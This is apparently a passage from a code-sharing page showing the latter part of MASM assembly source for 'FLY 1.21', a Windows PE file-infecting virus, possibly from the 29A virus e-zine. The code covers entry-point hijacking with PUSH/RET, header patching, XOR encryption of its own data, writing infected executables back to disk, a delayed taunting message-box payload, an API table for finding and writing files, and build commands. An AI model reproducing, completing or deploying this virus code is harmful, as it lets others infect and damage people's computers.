📄 29a-7.012
字号:
; save OEP
PUSH DWORD PTR [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
POP DWORD PTR [EDX + (OFFSET dwEPRva - OFFSET FLY_START)]
; save ImageBase
MOV EAX, b64Bit
DEC EAX
JZ ImageBase_is_qword
PUSH [EDI].IMAGE_NT_HEADERS.OptionalHeader.ImageBase
JMP @F
ImageBase_is_qword:
PUSH DWORD PTR [EDI.IMAGE_NT_HEADERS64.OptionalHeader.ImageBase]
@@:
POP EAX
MOV dwVictimBase, EAX
MOV [EDX + (OFFSET dwImageBase - OFFSET FLY_START)], EAX
; -> redirect EntryPoint, i.e.
; Victim_EntryPoint: PUSH virii_entry_VA (5 bytes)
; RET (6 bytes)
;INT 3
; find section belonging to the EntryPoint
PUSHAD
PUSH [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
MOVZX EAX, [EDI].IMAGE_NT_HEADERS.FileHeader.NumberOfSections
PUSH EAX
PUSH pFirstSecHdr
CALL RvaToSection ; EAX -> sec hdr to which the EntryPoint RVA refers
MOV [ESP].PUSHA_STRUCT._EAX, EAX
POPAD
TEST EAX, EAX
JZ cleanup_free_mem
; save bytes at EntryPoint
MOV EDX, [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
SUB EDX, [EAX].IMAGE_SECTION_HEADER.VirtualAddress
ADD EDX, [EAX].IMAGE_SECTION_HEADER.PointerToRawData ; EDX -> EntryPoint Offset
ADD EDX, ESI ; EDX -> EntryPoint Ptr
PUSH 6
MOV ECX, pVirusBody
ADD ECX, (OFFSET bEntryData - OFFSET FLY_START)
PUSH ECX
PUSH EDX
CALL memcpy
; assemble PUSH,RET at entry
MOV BYTE PTR [EDX], 068h
MOV ECX, VIRUS_OFFSET
ADD ECX, dwVictimBase
MOV DWORD PTR [EDX + 1], ECX
MOV BYTE PTR [EDX + 5], 0C3h
; set write flag in EntryPoint section
OR [EAX].IMAGE_SECTION_HEADER.Characteristics, 080000000h
;-> update NT hdrs
MOV [EDI].IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders, 01000h
LEA EAX, [EDI].IMAGE_NT_HEADERS.FileHeader.PointerToSymbolTable
MOV DWORD PTR [EAX], (FLY_TRADEMARK - OBFUSCATION_VAL)
ADD DWORD PTR [EAX], (OBFUSCATION_VAL)
; change EntryPoint
;PUSH dwRealHdrSize
;POP [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
MOV EDX, [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint ; EDX -> Entry RVA
; clear BoundImport because if it had been present we overwrote it with the virus body
LEA EDI, [EDI].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[11 * 8].VirtualAddress
SUB EAX, EAX
STOSD
STOSD
;-> encrypt data parition
PUSHAD
MOV EBX, EDX
CALL GetXorByte ; arg pushed above
PUSH EAX
PUSH (Variable_Crypt_End - Variable_Crypt_Start)
LEA EAX, [ESI + (VIRUS_OFFSET + (Variable_Crypt_Start - FLY_START))]
PUSH EAX
CALL memxor
POPAD
;-> write mem to file
SUB EDI, EDI ; EDI -> 0
PUSH FILE_BEGIN
PUSH EDI
PUSH EDI
PUSH hFile
CALL [EBX + _SetFilePointer]
PUSH EDI
LEA EAX, dwc
PUSH EAX
MOV EAX, dwFSize
ADD EAX, dwHdrSizeDelta
PUSH EAX
PUSH ESI
PUSH hFile
CALL [EBX + _WriteFile]
cleanup_free_mem:
PUSH ESI
CALL [EBX + _GlobalFree]
cleanup_file_handle:
PUSH hFile
CALL [EBX + _CloseHandle]
InfectFile_exit:
POPAD
RET
InfectFile ENDP
;
; Args:
; [ESP + 4] - ptr to first section header
; [ESP + 8] - number of sections
; [ESP + C] - dwRVA
;
; Returns:
; NULL in case of an error or PIMAGE_SECTION_HEADER
;
; ReservedRegs: NO
;
RvaToSection:
ARG_1 EQU [ESP + 4]
ARG_2 EQU [ESP + 8]
ARG_3 EQU [ESP + 12]
ASSUME ESI : PTR IMAGE_SECTION_HEADER
SUB EAX, EAX
MOV ESI, ARG_1 ; ESI -> ptr to first section hdr
MOV ECX, ARG_2 ; ECX -> number of sections
MOV EDI, ARG_3 ; EDI -> target rva
SUB EBX, EBX ; EBX -> 0
section_header_scan_loop:
MOV EDX, [ESI].VirtualAddress ; RVA >= VirtualAddress ?
CMP EDI, EDX
JB @F
CMP [ESI].Misc.VirtualSize, EBX ; VS == 0 (needed for Watcom files)
JZ add_RawSize_instead
ADD EDX, [ESI].Misc.VirtualSize ; RVA < VirtualAddress + VirtualSize ?
JMP compare
add_RawSize_instead:
ADD EDX, [ESI].SizeOfRawData
compare:
CMP EDI, EDX
JAE @F
JMP scan_done
@@:
ADD ESI, SIZEOF IMAGE_SECTION_HEADER
LOOP section_header_scan_loop
ASSUME ESI : NOTHING
scan_done:
TEST ECX, ECX
JZ @F
XCHG EAX, ESI
@@:
RET 12
;
; Args:
; [ESP + 4] - src
; [ESP + 8] - dest
; [ESP + C] - soue
;
; ReservedRegs: ALL
;
memcpy:
ARG_1 EQU [ESP + 4 + SIZEOF PUSHA_STRUCT]
ARG_2 EQU [ESP + 8 + SIZEOF PUSHA_STRUCT]
ARG_3 EQU [ESP + 12 + SIZEOF PUSHA_STRUCT]
PUSHAD
MOV ESI, ARG_1
MOV EDI, ARG_2
MOV ECX, ARG_3
REP MOVSB
POPAD
RET 12
;
; Args:
; [ESP + 4] - src
; [ESP + 8] - size
; [ESP + C] - xor byte
;
; ReservedRegs: ALL
;
memxor:
ARG_1 EQU [ESP + 4 + SIZEOF PUSHA_STRUCT]
ARG_2 EQU [ESP + 8 + SIZEOF PUSHA_STRUCT]
ARG_3 EQU [ESP + 12 + SIZEOF PUSHA_STRUCT]
PUSHAD
MOV ESI, ARG_1 ; ESI -> data ptr
MOV ECX, ARG_2
MOV EAX, ARG_3 ; EAX -> xor byte
memxor_loop:
XOR BYTE PTR [ESI], AL
INC ESI
LOOP memxor_loop
POPAD
RET 12
;
; this is the payload
;
; ReservedRegs: ALL
;
DriveUserNutsHiHi:
; PC already MIN_PAYLOAD_TICK seconds up ?
CALL [EBP + _GetTickCount]
CMP EAX, MIN_PAYLOAD_TICK
JB DriveUserNutsHiHi_exit
; build "USER32\0" on stack
SUB ESP, 8
MOV EDI, ESP ; User32 str on stack
MOV DWORD PTR [EDI], "RESU"
MOV DWORD PTR [EDI + 4], "23"
; get MessageBoxA addr
PUSH EDI
CALL [EBP + _LoadLibrary] ; EAX -> U32 base
ADD ESP, 8
OR EAX, EAX
JZ DriveUserNutsHiHi_exit
LEA EDI, [EBP + MBStrSize] ; EDI -> API info (str size/str)
MOVZX EBX, BYTE PTR [EDI]
PUSH EBX
INC EDI
PUSH EDI
PUSH EAX
CALL GetProcAddr ; EAX -> MessageBoxA addr
OR EAX, EAX
JZ DriveUserNutsHiHi_exit
; show msg
PUSH MB_SYSTEMMODAL OR MB_ICONWARNING OR MB_TOPMOST
LEA EBX, [EBP + szMBCaption]
PUSH EBX
LEA EBX, [EBP + szMBText]
PUSH EBX
SUB EBX, EBX
PUSH EBX
CALL EAX
DriveUserNutsHiHi_exit:
RET
;
; Reserved Regs: NO
;
; Args:
; EBX - EntryPoint RVA
;
; Returns: xor byte to dexor loader data parition in EAX
;
GetXorByte:
SUB EAX, EAX
SUB ECX, ECX
ADD CL, 4
GetXorByte_loop:
ADD AL, BL
SHR EBX, 8
LOOP GetXorByte_loop
RET
; ------ VARIABLES ----------------------------------------------------------------------
Loader_Variables:
dwEPRva DD 0 ; 0 in first generation
Variable_Crypt_Start:
dwImageBase DD 0 ; 0 in first generation
dwK32Base DD ?
bEntryData DB 6 DUP (0FFh)
MBStrSize DB 11 + 1
szMB DB "MessageBoxA", 0
szMBText DB "You stink.", 0
szMBCaption DB "FLY 1.21", 0
API_table:
DB 20 + 1
_GetCurrentDirectory DD ?
szGetCurrentDirectory DB "GetCurrentDirectoryA", 0
DB 20 + 1
_SetCurrentDirectory DD ?
szSetCurrentDirectory DB "SetCurrentDirectoryA", 0
DB 14 + 1
_FindFirstFile DD ?
szFindFirstFile DB "FindFirstFileA", 0
DB 13 + 1
_FindNextFile DD ?
szFindNextFile DB "FindNextFileA", 0
DB 9 + 1
_FindClose DD ?
szFindClose DB "FindClose", 0
DB 11 + 1
_CreateFile DD ?
szCreateFile DB "CreateFileA", 0
DB 11 + 1
_CloseHandle DD ?
szCloseHandle DB "CloseHandle", 0
DB 11 + 1
_GetFileSize DD ?
szGetFileSize DB "GetFileSize", 0
DB 11 + 1
_GlobalAlloc DD ?
szGlobalAlloc DB "GlobalAlloc", 0
DB 10 + 1
_GlobalFree DD ?
szGlobalFree DB "GlobalFree", 0
DB 8 + 1
_ReadFile DD ?
szReadFile DB "ReadFile", 0
DB 9 + 1
_WriteFile DD ?
szWriteFile DB "WriteFile", 0
DB 14 + 1
_SetFilePointer DD ?
szSetFilePointer DB "SetFilePointer", 0
DB 12 + 1
_LoadLibrary DD ?
szLoadLibrary DB "LoadLibraryA", 0
DB 12 + 1
_GetTickCount DD ?
szGetTickCount DB "GetTickCount", 0
dwcAPITableEnd DB 0
API_table_end:
Loader_Variables_end:
Variable_Crypt_End:
FLY_END:
end Main
; ------ END ----------------------------------------------------------------------------
:MAKE
CLS
\MASM32\BIN\ML /nologo /c /coff /Gz /Cp /Zp1 FLY.BAT
\MASM32\BIN\LINK /nologo /SUBSYSTEM:WINDOWS /SECTION:.text,REW FLY.obj
DEL *.OBJ
ECHO.
PAUSE
CLS
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -